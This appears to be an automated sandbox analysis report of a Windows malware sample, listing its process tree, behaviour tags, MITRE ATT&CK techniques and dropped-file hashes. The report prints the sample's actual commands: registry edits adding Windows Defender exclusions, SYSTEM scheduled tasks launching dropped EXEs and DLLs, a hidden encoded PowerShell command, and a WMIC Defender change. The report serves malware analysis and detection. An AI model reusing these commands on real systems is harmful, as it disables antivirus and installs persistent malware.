C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guMxBwmhz" /SC once /ST 03:12:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guMxBwmhz"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guMxBwmhz"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 04:33:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\xtdldNy.exe\" Wy /syLididxb 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 9242⤵
- Program crash
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2096 -ip 20961⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f0 0x3dc1⤵
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\xtdldNy.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\xtdldNy.exe Wy /syLididxb 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\uFfbEi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\MEkBGLy.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\zJAKysU.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\dTvBvzg.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\sBRwjtj.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\YYcXBBv.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:50:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\gyxroCtP\VrqjWBW.dll\",#1 /JudidM 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRTHivZIQsRdEanwm"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AjbuK1" /SC once /ST 06:47:06 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AjbuK1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AjbuK1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 24922⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3420 -ip 34201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\gyxroCtP\VrqjWBW.dll",#1 /JudidM 7576741⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\gyxroCtP\VrqjWBW.dll",#1 /JudidM 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 2096 -ip 20961⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffbe5a46f8,0x7fffbe5a4708,0x7fffbe5a47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3124 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2908 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,2472361591339706782,973521329580636437,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3340 /prefetch:22⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 5116 -ip 51161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5980 -ip 59801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2096 -ip 20961⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
473B
MD5f6719687bed7403612eaed0b191eb4a9
SHA1dd03919750e45507743bd089a659e8efcefa7af1
SHA256afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59
SHA512dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56
-
Filesize
984B
MD50359d5b66d73a97ce5dc9f89ed84c458
SHA1ce17e52eaac909dd63d16d93410de675d3e6ec0d
SHA256beeab2f8d3833839399dde15ce9085c17b304445577d21333e883d6db6d0b755
SHA5128fd94a098a4ab5c0fcd48c2cef2bb03328dd4d25c899bf5ed1ca561347d74a8aab8a214ba2d3180a86df72c52eb26987a44631d0ecd9edc84976c28d6c9dc16a
-
Filesize
789KB
MD5e0d54f2d93eb1e3a3dd67a4f959912d8
SHA16ae70774061c0765292cc8e0d3e21ec3f6e736da
SHA2562d3147321c877e6e250a66794ce9bacc88748407ef0f3501f274f73ed1c181ad
SHA51278f3f0cfaff37c8fb32f7d9308e90ca06b7fdb1107f876ff4ceac5a70dd7cd455e33671ebeb3c76dfbe15cbfac04b88090d9c974ff063faf8f89331b09061b28
-
Filesize
831B
MD5218a7e57c65b88f7508196fdcf0b6725
SHA1318c89b96c692a44ef622bfe4a6b412196b9d301
SHA256e0037e5808a9bcb02e199ffc33d6a6d1f46cfe344f7fc086316029d3bb38c90a
SHA512662d90cb71f7cf76256f4b1a544c3fd51598ca5216fcafc02d6f6aa3233733284d114215ef14ee56314cf364ff1e8523c92e30d32f8187689ba5009ea666092f
-
Filesize
831B
MD54555678a2c008aee910d0e7596d09aa7
SHA122866b0ba1cf39b0a25f816e56d6d1a855067053
SHA256217c876b2d7fc8dcce25bfa97aaa6472b597623a8e87bf7a23c0a66f80057bcd
SHA512b2d40b9bb2bce650506bc49f479827ee302ef5847eab27c252adc0c7db606136eaaa4fefb74e515238b3838067fbd936f24ccafaf894ddc3d62f6487bbfed9c3
-
Filesize
831B
MD57a149eb25003876bd61b5fd225ade8c8
SHA1dfad20d51ad5b98f261d4052fb1bb26062111731
SHA256aa7d826b3d4ff7b88fa001224eb7c576baaecf4d521eb8f9f3630d9799ecfcf3
